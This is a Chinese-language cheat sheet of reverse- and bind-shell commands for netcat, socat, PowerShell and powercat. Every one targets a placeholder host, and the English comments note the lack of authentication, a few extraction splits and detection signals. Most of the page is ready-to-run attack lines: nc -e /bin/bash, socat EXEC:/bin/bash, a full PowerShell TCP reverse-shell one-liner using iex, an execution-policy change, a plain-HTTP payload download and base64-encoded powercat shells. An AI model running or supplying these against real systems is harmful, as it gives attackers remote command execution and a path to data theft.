
常見的幾種反彈shell(整理中)

目錄

netcat

# Banner-grab a port (telnet-style fingerprinting); 110 is POP3 here.
# -n skips DNS lookups, -v prints what the remote service sends back.
nc -nv x.x.x.x 110

# File download over a raw TCP socket: the listener redirects its stdin to a file.
# NOTE: nothing on the wire is encrypted or authenticated — whoever reaches
# port 4444 first is the one who receives or supplies tmp.exe.
# Server side
nc -nlvp 4444 > tmp.exe
# Client side
nc -nv x.x.x.x 4444 < tmp.exe

# Bind shell: the target listens and -e hands the accepted socket to cmd.exe.
# -e exists only in some netcat builds (nc.traditional, ncat); the OpenBSD nc
# shipped by many distributions does not have it.
# Target
nc -nlvp 4444 -e cmd.exe
# Local host
nc -nv x.x.x.x 4444

# Reverse shell: the local host listens, the target connects out and attaches
# /bin/bash to the socket. In both variants the socket is unauthenticated, so
# any peer that reaches the port gets the shell.
# Defender note: a network tool spawning a shell whose stdio is a socket is the
# behaviour that audit/EDR rules for these commands typically key on.
# Local host
nc -nlvp 4444
# Target
nc -nv x.x.x.x 4444 -e /bin/bash

socat

# File transfer
# Server side: serves the file to every connection (fork). Plain TCP, no auth,
# so anyone who can reach port 443 can read secret_passwords.txt.
socat TCP4-LISTEN:443,fork file:secret_passwords.txt
# Client side: writes whatever it receives to a new file (create)
socat TCP4:x.x.x.x:443 file:received_secret_passwords.txt,create

# Reverse shell
# Local host: each -d raises verbosity; two of them print connection notices to stderr
socat -d -d TCP4-LISTEN:443 STDOUT
# Target: connects out and wires bash's stdio to the socket
socat TCP4:x.x.x.x:443 EXEC:/bin/bash

# Encrypted bind shell
# Self-signed certificate. "36 2" after -days reads as an extraction-split value
# on this page, so the line will not run as shown.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt
# socat expects key and certificate in a single PEM file
cat bind_shell.key bind_shell.crt > bind_shell.pem
# Local host (listener). "/bin /bash" is likewise split as extracted.
# NOTE: verify=0 on both ends disables certificate verification, so the TLS
# session hides traffic from passive capture but authenticates nobody — either
# end can be impersonated by whoever reaches the port first.
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash
socat - OPENSSL:x.x.x.x:443,verify=0

powershell

# Allow PowerShell scripts to run. This is a host-wide policy change, not a
# sandbox escape: the execution policy is a guardrail against accidental
# execution, and relaxing it is itself a common audit signal. Get-ExecutionPolicy
# prints the resulting setting.
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

# Download a file with WebClient over plain HTTP — no TLS and no integrity
# check on t.exe before it is written to disk.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/t.exe','C:\Users\user\Desktop\t.exe')"

# Reverse shell (one-liner): opens a TCP client to x.x.x.x:443, reads each
# received chunk into a 64 KiB buffer, runs it with iex (Invoke-Expression) and
# writes stdout/stderr back followed by a fake "PS <cwd>> " prompt. The loop
# ends when Read returns 0, i.e. when the peer closes the connection.
# The socket is unauthenticated: whoever holds the other end runs commands as
# the invoking user. "$c lient" near the end is split as extracted; the
# variable is $client.
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()"

# Bind shell (one-liner): same read/iex/write loop, but it listens on all
# interfaces (0.0.0.0:443) and serves the single client that AcceptTcpClient
# returns, then stops the listener. "$byt es" is likewise split as extracted.
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

powercat

# Load the module by dot-sourcing it into the current session
. .\powercat.ps1
# Run it / show the built-in help
powercat
powercat -h

# Send a file (-i) to x.x.x.x:443 — plain TCP, no encryption or authentication
powercat -c x.x.x.x -p 443 -i C:\Users\user\powercat.ps1

# Reverse shell
# Method 1: connect out (-c) and attach cmd.exe (-e) to the socket
powercat -c x.x.x.x -p 443 -e cmd.exe
# Method 2: -g generates the equivalent standalone script instead of running it;
# the second line then executes that script
powercat -c x.x.x.x -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1

# Base64 encoding. The original heading calls this 加密 ("encryption"), but
# base64 is only an encoding: -ge emits the generated script in the form that
# powershell -E (EncodedCommand) accepts and provides no confidentiality.
# "reverseshell. ps1" is split as extracted. The parenthetical on the last line
# is the author's placeholder for the base64 content of reverseshell.ps1.
powercat -c x.x.x.x -p 443 -e cmd.exe -ge > reverseshell. ps1
powershell.exe -E ZgB1...(reverseshell. ps1中base64加密內容)

# Bind shell: listen (-l) on 443 and attach cmd.exe to the first connection
powercat -l -p 443 -e cmd.exe